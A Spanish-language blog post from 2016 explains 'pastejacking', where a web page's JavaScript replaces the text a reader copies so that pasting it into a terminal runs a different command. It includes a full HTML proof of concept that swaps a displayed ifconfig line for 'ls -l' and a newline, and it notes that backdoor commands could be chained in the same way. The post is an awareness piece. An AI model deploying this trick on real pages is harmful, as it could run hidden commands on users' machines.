Hackeando tu servidor o computadora desde el portapapeles.
By: Date: junio 15, 2016 Categories: Hackers, Tools y Retos

Cuando las paginas empezaba a tener acceso a JavaScript una de las principales funciones que se le dio fue proteger los contenidos de las páginas en internet para que no fueran copiadas, entre esas protecciones estaba la de que, al detectar el evento de copiar al portapapeles, el navegador sobre escribe la información copiada con nada, cuando quieres pegar algo no se pegara nada. En otras ocasiones lo que se pegaba era un mensaje que decía que estaba prohibido copiar la información de la página WEB.

No falto mucho tiempo para que esa función se trasladara al lado obscuro, que tal si en lugar de copiar un mensaje de que está prohibido copiar, en lugar de eso se copiaran comandos que pudieran crear script o backdoors en las terminales de los copiaban información al portapapeles.

Este tipo de hack es difícil de aplicar, pero no imposible, especialmente porque se puede hacer en páginas que tienen manuales ya sea para la consola de Windows o para las de Linux en donde muchas veces se le sugiere al lector copiar al portapapeles y pegar las instrucciones en la consola. Si el sitio es malicioso al hacer esta copia del portapapeles, lo que realmente se copiara seria instrucciones que podrían instalar aplicaciones o crear usuarios en el sistema o prácticamente cualquier cosa que se pudiera hacer en la Shell

En la siguiente página https://www.lastdragon.net/misarchivos/ataqueportapapeles.html podrás ver un ejemplo. Copia el contenido de la página y pégalo en un bloc de notas, podrás ver que lo que copias es una cosa pero lo que pegas es otra muy diferente, en el caso de este ejemplo se pega ls -l es un comando que no causa daño, solo lista directorios si se escribe una terminal con Shell bash en GNU/Linux.

El código fuente que hace esto ni siquiera es complicado y es el siguiente.

<html>
<head>
<title>Ataque al portapeles</title>
</head>
<body>
</br>
<h2>Cambiar la IP en GNU/Linux</h2>
<p>ifconfig eth0 200.34.35.1 netmask 255.255.255.0</p>
<p>Cuando copies el comando ifconfig, en el portapales se copiara ls -s con un retorno de carro, si lo pegas en una termina con GNU/Linux o algun tipo de Unix se ejecutara sin que puedas evitarlo. Tambien se podrian contatenar los comandos para crear un script que haga un Backdoor o instale algo. Este ataque es al copiar al portapapeles desde el navegador, por lo que si estas en Windows o GNU/Linux igual sera efectivo.</p>
<script>
document.addEventListener('copy', function(e){
console.log(e);
e.clipboardData.setData('text/plain', 'ls -l \n');
e.preventDefault();
});
</script>
</body>

</html>

 

3 thoughts on “Hackeando tu servidor o computadora desde el portapapeles.

  1. Google Chrome 55.0.2883.87 Windows 7

    igualmente cuando seleccionas y arrastras la selección, no se detecta como copiado.
    solo en los casos de el evento. buena aportación evitare ese tipo de copiados.

Deja un comentario

Tu dirección de correo electrónico no será publicada.